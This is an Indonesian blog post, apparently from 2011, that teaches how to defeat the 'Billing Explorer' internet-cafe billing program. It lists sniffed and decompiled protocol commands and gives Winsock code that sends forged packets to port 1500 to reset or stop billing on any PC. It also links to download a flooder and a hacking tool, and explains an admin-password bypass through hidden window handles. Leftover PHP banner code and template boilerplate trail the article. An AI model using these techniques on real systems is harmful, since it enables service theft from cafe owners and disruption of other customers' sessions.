Senin, 31 Januari 2011

tehnik_menembus_billing_explorer

Untuk mencoba artikel ini, anda bisa mendownload program billing explorer demo di situ

Code:

http://www.billingexplorer.com

- Server Side

- Client Side

Saya asumsikan bahwa anda sudah mendowload dan menginstall di lokal komputer.

Kali ini kita coba dilokal terlebih dahulu, sebelum kita pergi ke warnet untuk melakukan percobaan artikel ini

Pengiriman data dari Client keserver biasanya diawali dengan kata kunci:

XX2

sedangkan pengiriman data dari Server ke client selalu diawali dengan kata kunci :

YA6

Nah pasti diantara pembaca bertanya2, gimana
caranya mendapatkan nilai2 tersebut?..bingung kan?….sebetulnya sih
gampang aja, kita gunakan program paket sniffer untuk melihat paket
data yang masuk dan paket data yang keluar.

kalo mau coba-coba bisa menggunakan program ‘ether detect packet sniffer’ di www.etherdetect.com

ok, kita balik lagi ke pembahasan kita…..

ada beberapa perintah yang dikirim oleh client ke server, seperti:

Client Command

——————

$ablock$

$ablock2$

$act$

$ajblock$

$cekc$

$cektime$

$con$

$con1$

$con1dis$

$data$

$dina2$

$gpass$

$group$

$hblock$

$infod_0$

$infod_1$

$infod2$

$infod3$

$infod32$

$infod4$

$infouser$

$member$

$movecek$

$okmove2$

$paket$

$passA$

$pelajar$

$personal$

$rental$

$ruser$

$ruserh$

$send$

$sendcc$

$okmove1$

$tutup$

perintah-perintah
tersebut saya dapatkan berdasarkan hasil decompiler program dengan
menggunakan software vbLite & W32Dasm.Setelah kita mengetahui
beberapa perintah diatas, kita bisa mencoba langsung dengan menggunakan
perintah-perintah tersebut.kita gunakan komponen winsock untuk
melakukan koneksi ke server, biasanya program B-Exp menggunakan port
1500 (default)

jadi kita bisa menuliskan syntax berikut:

Winsock1.Connect "192.168.0.1″,1500

artinya kita akan melakukan koneksi ke 192.168.0.1 dengan port 1500.

setelah anda berhasil terhubung keserver yang anda harus lakukan adalah
mengirim inisialisasi paket data, agar program tersebut menerima
permintaan kita.

adapun data yang dikirim adalah:

XX2$dina2$$$

diisi dengan pc yang akan kita gunakan sebagai inisialisasi koneksi.

contoh:

Winsock1.sendData "XX2$dina2budak baonk$”

(artinya: kita melakukan koneksi sebagai komputer no 1 dengan nama budak baonk)

kalo pengiriman data berhasil, maka program B-Exp server akan mengirimkan data

"YA6$/connn$” yang artinya kita sudah terkoneksi ke billing dan program
billing sudah siap menerima perintah2 yang dilakukan oleh program
client.

Selanjutnya untuk memulai perhitungan billing kita bisa menggunakan dengan perintah:

XX2$con$2

Winsock1.SendData "XX2$con$1″

Perintah diatas juga bisa digunakan untuk mereset durasi/lama penggunaan billing.

jadi kalo anda udah pake selama 10 jam bisa balik lagi ke 0 jam dengan perintah tersebut

Nah selanjutnya untuk memberhentikan penggunaan billing kita bisa lakukan dengan mengirim perintah: XX2$web2Hacker

Winsock1.SenData "XX2$web2xxx”

perintah diatas bertujuan untuk menghentikan
penghitungan billing pada no Pc 1 dengan nama budak baong. jadi kita
bisa menghentikan selain pc yg kita pake, dengan merubah no pc.

gampang kan, so….kalian bisa coba-coba dengan
perintah-perintah lainnya…kalo masih tetep bingung cara bikin
programnya….hmm.mm…..jangan khawatir aku dah bikin programnya, jadi
tinggal pake aja coy…

Download Sock B-Exp flooder :

Code:

http://www.vbbego.com/files/billEX.rar

—-

Cara Kedua

Untuk artikel selanjutnya penulis akan mencoba kembali memperlihatkan bagaimana

menggunakan Billing Explorer Client dengan login Admin.

Biasanya untuk login dengn jenis admin perhitungan billing otomatis tidak

berjalan (disable) untuk memulainya anda harus mendownload terlebih dahulu tool

yang sudah dibuat:

Download hack-Bexp :

Code:

http://www.vbbego.com/files/hackbillEX.rar

Setelah selesai download toolsnya, kita bisa langsung mencobanya.

ada beberapa langkah yang harus anda ikuti:

Anda login terlebih dahulu ke program billing spt biasa, dengan memilih jenis personal dengan nama login "xxx”

Setelah login maka secara otomatis program
billing akan bekerja seperti biasa untuk menghitung lama penggunaan
internet. Selanjutnya kita bisa jalankan tools yang tadi kita download
untuk memulai melihat-lihat ada apa dibalik program B-Exp (billing
explorer).

Secara otomatis program akan mencari apakah
program billing berjalan di komputer atau tidak, dengan mencari caption
id "????A?|A?” , apabila tidak ada maka program akan langsung keluar
dan proses akan berhenti.

Apabila program billing ditemukan maka, program
tersebut akan merubah parrent dari program billing explorer ke program
"Hack B-Exp”

program billing sekarang sudah terperangkap
didalam "hack b-exp” selain itu anda bisa lihat daftar HWND ID yang
terdapat pada listbox, dimana kita bisa menampilkan objek-objek yang
tersembunyi.

Biasanya kalo kita mengklik tombol Admin maka
program Billing menyuruh kita memasukan password, tapi jangan
khawatir…itu sangat mudah untuk dilewati.

ada yg tau gimana caranya……..pasti belum donk….

nah untuk masuk ke menu setting admin yang perlu
kita lakukan adalah mencari kata #root:Administrator pada daftar handle
windows.

ya kalo udah gini terserah anda, mau login gratis
tinggal klik tombol Login, atau merubah setting lainnya ya bebas aja.
Jadi silahkan coba klik item-item yang ada pada daftar handle window
dan lihat apa yang tersembunyi di program billing tersebut.

Ternyata tidak sulit juga kan, kenapa demikian……he…he… semua ini

disebabkan pembutan setting dan login digabungkan dalam satu form
dengan hanya memainkan properti VISIBLE…dan ini membuat mudah untuk
ditampilkan kembali.



















$bn4652img = '';
$bn4652object = '';
$bn4652alt = '';
$bn4652link = '';
$bn4652width = 200;
$bn4652height = 40;
$bn4652pos = 1;
$bn4652xoffset = 0;;
$bn4652yoffset = 0;;
$sahfa5pg = 'www.duniamaya.at.ua';


if ($bn4652object)
$bn4652img = $bn4652object;
else
{
$bn4652img = "$bn4652alt";if ($bn4652link) $bn4652img = "$bn4652img";}

$tempvar = "";

$tempvar .=
"
";


$bfr =
"$tempvar";

echo $bfr;
?>

0 komentar:

  © Blogger templates The Professional Template by Ourblogtemplates.com 2008

Back to TOP